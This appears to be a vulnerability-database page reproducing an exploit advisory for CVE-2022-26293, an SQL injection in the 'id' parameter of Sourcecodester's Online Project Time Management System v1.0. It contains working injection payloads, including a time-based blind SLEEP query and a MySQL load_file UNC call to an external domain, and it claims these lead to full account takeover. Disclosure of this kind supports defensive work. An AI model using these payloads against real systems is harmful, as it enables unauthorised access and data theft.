| Reporter | Title | Published | Views | Family All 11 |
|---|---|---|---|---|
| CVE-2022-26293 | 16 Mar 202220:15 | – | attackerkb | |
| CVE-2022-26293 | 16 Mar 202223:20 | – | circl | |
| Sourcecodester Online Project Time Management System SQL注入漏洞 | 16 Mar 202200:00 | – | cnnvd | |
| Online Project Time Management System SQL Injection Vulnerability | 18 Mar 202200:00 | – | cnvd | |
| CVE-2022-26293 | 16 Mar 202219:22 | – | cve | |
| CVE-2022-26293 | 16 Mar 202219:22 | – | cvelist | |
| EUVD-2022-30854 | 3 Oct 202520:07 | – | euvd | |
| CVE-2022-26293 | 16 Mar 202220:15 | – | nvd | |
| CVE-2022-26293 | 16 Mar 202220:15 | – | osv | |
| Sql injection | 16 Mar 202220:15 | – | prion |
## Title: Online Project Time Management v1.0 SQLi
## Author: nu11secur1ty
## Vendor: https://www.sourcecodester.com/users/tips23
## Software: https://www.sourcecodester.com/php/15136/online-project-time-management-system-phpoop-free-source-code.html
## Reference: https://github.com/nu11secur1ty/CVE-mitre/tree/main/2022/CVE-2022-26293
## Description:
The id parameter appears to be vulnerable to SQL injection attacks. The payload '+(select load_file('\\\\u7205zjf5m2cgpr195q5vjxg0760usvgmjaax1lq.sourcecodester.com/php/15136/online-project-time-management-system-phpoop-free-source-code.html\\qgh'))+' was submitted in the id parameter.
This payload injects a SQL sub-query that calls MySQL's load_file function with a UNC file path that references a URL on an external domain. The application interacted with that domain, indicating that the injected SQL query was executed.
The attacker can take administrator account control and also of all accounts on this system, also the malicious user can download all information about this system.
Status: CRITICAL
[+] Payloads:
```mysql
---
Parameter: id (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: page=projects/view_project&id=1'+(select load_file('\\\\u7205zjf5m2cgpr195q5vjxg0760usvgmjaax1lq.sourcecodester.com/php/15136/online-project-time-management-system-phpoop-free-source-code.html\\qgh'))+'' AND (SELECT 9854 FROM (SELECT(SLEEP(5)))YUoR)-- CNQi
---
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-mitre/tree/main/2022/CVE-2022-26293)
## Proof and Exploit:
[href](https://streamable.com/habaj9)
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation